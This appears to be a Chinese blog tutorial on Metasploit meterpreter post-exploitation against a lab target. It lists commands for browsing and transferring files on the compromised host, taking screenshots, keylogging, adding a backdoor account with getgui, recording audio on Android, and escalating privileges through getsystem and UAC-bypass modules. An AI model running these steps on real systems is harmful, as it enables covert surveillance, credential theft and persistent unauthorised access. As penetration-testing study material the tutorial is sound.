msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)
目录
1、文件交互指令
2、上传下载文件(windows)
3、屏幕截图(windows)
4、键盘记录(windows)
1、先启动记录keyscan_start
2、显示键盘输入内容keyscan_dump
3、结束监控keyscan_stop
5、创建账户(windows)
1、先看下目标靶机已存在用户
2、使用getgui创建 一个用户名为 xiaowei 密码为 123456 的账户
6、音频录像(Android)
7、提权(Windows)
方法一:
方法二:
1、文件交互指令
| Command | Description |
| cd{路径} | 切换靶机目录 |
| cat | 读取文件目录 |
| cp | 复制文件到目标 |
| mv | 移动到目标 |
| chmod | 修改文件的权限(chmod 777 shell.elf) |
| del/rm | 删除靶机目录 |
| dir | 打印靶机目录 |
| mkdir | 在靶机上创建目录 |
| rmdir | 靶机删除目录 |
| edit{文件所在地址或名} | 编辑文件 |
| getlwd | 打印本地目录路径 |
| getwd | 打印靶机目录路径 |
| lcd | 更改本地目录 |
| lls | 列出本地目录 |
|
ls |
列出靶机的目录 |
| lpwd | 打印本地目录 |
| pwd | 打印工作目录 |
| search | 搜索文件 详细search -h |
| etc |
2、上传下载文件(windows)
| Command | Description |
| upload | 传文件到靶机 |
| download | 从靶机下载文件 |
3、屏幕截图(windows)
| Command | Description |
| screenshot | 截图(Windows) |
4、键盘记录(windows)
1、先启动记录keyscan_start
2、显示键盘输入内容keyscan_dump
3、结束监控keyscan_stop
5、创建账户(windows)
1、先看下目标靶机已存在用户
meterpreter中输入:run post/windows/gather/enum_logged_on_users
2、使用getgui创建 一个用户名为 xiaowei 密码为 123456 的账户
run getgui -u xiaowei -p 123456run getgui -u {用户名}-p {密码}
注意:
创建之前要是系统权限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)输入 getsystem就好了。
如果仍然出现错误,绕过UAC提权:
- 先输入bg,进入后台
- 使用这个模块use exploit/windows/local/ask
- options查看需要配置哪些模块
- run
6、音频录像(Android)
record_mic -h 查看使用方法
开始录音
7、提权(Windows)
先输入getuid查看当前用户的权限,可知为普通用户。
方法一:
getsystem
方法二:
使用msf模块提权
先进入msf后台bg或者background
- 查询可以提权的模块 search bypassuac 查看提权模块
- 选择一个适合当前系统的提权模块 use 1(如果没有成功就选择其他模块)
- 配置模块使用参数 options (session值可以在终端直接输入session得到)
- 可以看到需要配置session set session {需要提权的session id}
- 执行提权 run
- 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限
msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)相关推荐
- SecureCRTSecureFX Portable远程连接Linux;上传下载文件
SecureCRT和SecureFX都是由VanDyke出品的SSH传输工具. SecureCRT是一款非常好用的.支持多标签的SSH客户端,极大方便了管理多个SSH会话. SecureFX则是一款专 ...
- java 文件上传到ftp_JAVA技术实现上传下载文件到FTP服务器(完整)
具体详细介绍请看下文: 在使用文件进行交互数据的应用来说,使用FTP服务器是一个很好的选择.本文使用Apache Jakarta Commons Net(commons-net-3.3.jar) 基于 ...
- 初级版python登录验证,上传下载文件加MD5文件校验
服务器端程序 import socket import json import struct import hashlib import osdef md5_code(usr, pwd):ret = ...
- JavaWeb:上传下载文件
1. 文件上传概述 1.1 文件上传的作用 例如网络硬盘!就是用来上传下载文件的. 在智联招聘上填写一个完整的简历还需要上传照片呢. 1.2 文件上传对页面的要求 上传文件的要求比较多,需要记一下: ...
- 利用PostMan 模拟上传/下载文件(亲测)
来源:利用PostMan 模拟上传/下载文件 - 王若伊_恩赐解脱 - 博客园 我们经常用postman模拟各种http请求.但是有时候因为业务需要,我们需要测试上传下载功能.其实postman也是很 ...
- linux上很方便的上传下载文件工具rz和sz
linux上很方便的上传下载文件工具rz和sz (本文适合linux入门的朋友) ######################################################### # ...
- postman测试 上传下载文件
postman测试 上传下载文件 1 测试上传文件 选择 Body 选择 form-data 参数 key 值 填写后 在后面下拉选择 file value 点击 Select Files 选择需要上 ...
- java 百度网盘上传_使用pcs api往免费的百度网盘上传下载文件的方法
百度个人云盘空间大,完全免费,而且提供了pcs api供调用操作文件,在平时的项目里往里面保存一些文件是很实用的. 环境准备: 开通读写网盘的权限及获取access_token:http://blog ...
- java 上传文件及预览_SpringBoot上传下载文件及在线预览
SpringBoot上传下载文件及在线预览 今天大概就说说如何使用SpringBoot进行上传和下载以及在线预览文件 本篇主要介绍上传下载的功能,对于界面就简单一点,大致如下: 一.老规矩还是先看看小 ...
最新文章
- 扩增子分析解读7物种分类统计,筛选进化树和其它
- python使用openCV图像加载(转化为灰度图像)、Canny边缘检测器检测图像的边缘(Detect Edges)
- 编写Dockerfile增强centos镜像:安装vim 和net-tools
- Thymeleaf——访问静态资源(static)解决方案
- boost::python::def相关的测试程序
- 计算机键盘输入法基础知识,教程计算机基础知识-:认识输入法
- JAVA解压Zip格式文件的代码
- 实现仿微信朋友圈评论输入框
- 国产之光!Mac必备长截图软件!iShot 1.7.7中文版
- basic auth java_java发送带Basic Auth使用 httpclient自带的认证方式
- SQL Server事物日志
- 图片加载框架之UIL
- 正式加入阿里巴巴!跟Android初学者分享几点经验,附超全教程文档
- BZOJ3837: [Pa2013]Filary
- github软件---百度网盘加速
- 【老生谈算法】matlab实现Chan算法及其验证源码——Chan算法
- MYSQL(连接查询)
- 毕业设计 基于云平台的火灾报警系统设计与实现 - stm32 物联网 单片机 OneNET云平台
- layui icon 使用
- 我很认真的推荐几个大前端公众号